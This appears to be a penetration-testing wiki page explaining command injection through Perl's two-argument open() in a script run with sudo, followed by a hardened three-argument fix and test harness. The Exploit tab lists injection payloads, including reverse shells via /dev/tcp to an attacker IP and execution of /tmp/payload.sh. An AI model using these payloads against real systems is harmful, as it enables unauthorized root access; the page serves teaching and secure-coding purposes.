# Perl

## Theory

Perl scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, Perl scripts can be vulnerable to various security issues which, if exploited, can lead to privilege escalation and unauthorized access.

## Practice

### Open() Command Injection

{% tabs %}
{% tab title="Enumerate" %}
Assume the Perl script can be executed as root with sudo rights. If it uses the `open()` function and we control its input, then the script is vulnerable to arbitrary code execution.

```bash
sudo -l
    (root): /usr/bin/perl open.pl
```

Check whether we control the input passed to the vulnerable function:

```perl
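# $file is read from STDIN (or a file named on the command line): user-controlled
my $file = <>;
# Two-argument open(): the mode is parsed out of $file itself, including '|'
open(FH, $file);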
while (my $line = <FH>) {
  print($line);
}
```

{% endtab %}

{% tab title="Exploit" %}
If we control a variable passed to this vulnerable function, we can inject arbitrary code. Here are examples of malicious payloads passed to the `open()` function:

```bash
$ sudo /usr/bin/perl open.pl

|bash -c 'bash -i >& /dev/tcp/<ATTACKING_IP>/9001 0>&1'
bash -c 'bash -i >& /dev/tcp/10.10.14.12/9001 0>&1'|
|/tmp/payload.sh
```

{% hint style="info" %}
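With the two-argument form of `open()`, a leading or trailing `|` is built-in functionality: Perl executes the rest of the string as a command instead of opening it as a regular file. The file must be executable.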
{% endhint %}
{% endtab %}
{% endtabs %}
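The fix for the script above is the three-argument form of `open()` with an explicit `<` mode, which treats the input as a literal path. The following is an added example, not code from the original page; the helper name `read_file_safely`, the temporary directory and the sample inputs are constructed for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Hardened replacement for the read loop in open.pl (hypothetical helper name).
# Three-argument open with an explicit '<' mode treats $name as a literal
# path, so a leading or trailing '|' has no special meaning.
sub read_file_safely {
    my ($name) = @_;
    chomp $name;                                  # drop the newline read from input
    return (undef, "empty file name") unless length $name;
    open(my $fh, '<', $name)
        or return (undef, "cannot open '$name': $!");
    local $/;                                     # slurp the whole file
    my $data = <$fh>;
    close $fh;
    return ($data, undef);
}

# Constructed test data: one real file and two pipe-style names.
my $dir  = tempdir(CLEANUP => 1);
my $good = File::Spec->catfile($dir, 'notes.txt');
open(my $out, '>', $good) or die "setup failed: $!";
print {$out} "hello\n";
close $out;

# If any input were executed as a command, this marker file would appear.
my $marker = File::Spec->catfile($dir, 'executed');
my @inputs = ("$good\n", "|touch $marker\n", "touch $marker|\n");

for my $input (@inputs) {
    my ($data, $err) = read_file_safely($input);
    (my $shown = $input) =~ s/\n\z//;
    if (defined $err) { print "REJECTED [$shown]: $err\n" }
    else              { print "READ     [$shown]: $data" }
}

my $ran = -e $marker;
print $ran ? "marker exists: a command ran\n" : "marker absent: no command ran\n";
```

The same loop written with the two-argument `open(FH, $file)` from the script above would run `touch` for the second and third inputs and create the marker file.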

## References

{% embed url="https://ippsec.rocks" %}
